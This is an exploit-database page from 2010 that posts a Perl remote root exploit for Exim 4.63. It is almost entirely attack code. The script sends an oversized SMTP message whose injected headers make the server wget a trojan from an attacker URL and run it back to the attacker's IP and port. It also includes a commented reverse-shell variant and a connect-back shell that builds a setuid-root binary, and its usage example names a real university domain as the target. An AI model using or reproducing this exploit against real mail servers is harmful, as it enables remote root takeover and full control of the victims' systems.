[remote exploits] - Exim 4.63 Remote Exploit
Posted on 11 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Exim 4.63 Remote Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exim 4.63 Remote Exploit by Kingcope in remote exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================== Exim 4.63 Remote Exploit ======================== #Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] "; die "Ex: $0 127.0.0.1 2121 "; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host "; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host "; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE; system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = ${run{/bin/chown root:root /var/spool/exim4/s}}${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE; system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system); ---snip--- =cut use IO::Socket; if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport> "; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443 "; exit; } $|=1; $trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com"; $max_msg = 52428800; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp'); while(<$sock>) { print; if ($_ =~ /220 /) { last;} } print $sock "EHLO $helohost "; while(<$sock>) { print; if ($_ =~ /250-SIZE (d+)/) { $max_msg = $1; print "Set size to $max_msg ! "; } if ($_ =~ /^250.*Hello ([^s]+) [([^]]+)]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} } if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; } $vv .= "(" . $helohost . ")"; $from = "root@local.com"; $to = "postmaster@localhost"; $msg_len = $max_msg + 1024*256; $logbuffer_size = 8192; $logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg "; $logbuffer .= "Envelope-from: <$from> Envelope-to: <$to> "; $filler = "V" x (8 * 16); $logbuffer_size -= 3; for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s ", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= " "; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; } $hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "${run{/bin/sh -c "exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'"}} "; $k2++; } $v = "A" x 255 . " "; $body = ""; while (length($body) < $msg_len) { $body .= $v; } $body = substr($body, 0, $msg_len); print $sock "MAIL FROM: <$from> "; $v = <$sock>; print $v; print $sock "RCPT TO: <$to> "; $v = <$sock>; print $v; print $sock "DATA "; $v = <$sock>; print $v; print "Sending large buffer, please wait... "; print $sock $hdrs; print $sock $hdrx . " "; print $sock $body; print $sock " . "; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from> "; $v = <$sock>; print $v; print $sock "RCPT TO: <$to> "; while(1){}; # <a href='http://1337db.com/'>1337db.com</a> [2010-12-11]</pre></body></html>
